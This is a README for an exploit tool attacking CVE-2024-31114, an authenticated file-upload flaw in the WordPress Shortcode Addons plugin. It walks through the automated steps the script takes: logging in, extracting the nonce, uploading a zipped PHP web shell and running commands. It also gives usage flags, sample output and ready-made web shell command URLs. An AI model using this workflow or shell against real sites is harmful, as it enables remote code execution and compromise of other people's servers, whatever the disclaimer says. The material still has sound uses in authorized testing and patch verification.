# CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

**Shortcode Addons <= 3.2.5 – Authenticated (Admin+) Arbitrary File Upload**  
**CVE ID:** CVE-2024-31114  
**CVSS Score:** 9.1 (Critical)  

---

## 🛠️ Vulnerability Description

The **Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension** plugin for WordPress is vulnerable to arbitrary file uploads due to **missing file type validation** in all versions **up to and including 3.2.5**.

This flaw allows **authenticated attackers with administrator-level access or higher** to upload arbitrary files to the server — which can lead to **Remote Code Execution (RCE).**

---

## 🚀 Script Description

This Python script automates exploitation of the vulnerability. It performs:

1. Disabling SSL verification
2. Logging in with given credentials
3. Extracting the CSRF token (`_wpnonce`)
4. Generating a PHP shell (`nxploit.php`)
5. Compressing and uploading it as a `.zip`
6. Confirming the upload and accessing the shell
7. Executing `whoami` on the target server

---

## 🧪 Usage

```bash
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password
```

---

## 📤 Example Output

```
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
```

---
## 🐚 Web Shell Usage

Once the payload is uploaded, you can execute system commands using the following format:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
```

🔹 Example:

```
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
```

This will list the contents of the current directory on the server.


## ⚠️ Disclaimer

This tool is for **educational and authorized testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this script.

Use responsibly and only on systems you have explicit permission to test.

---
**By:** Nxploited | Khaled Alenazi  


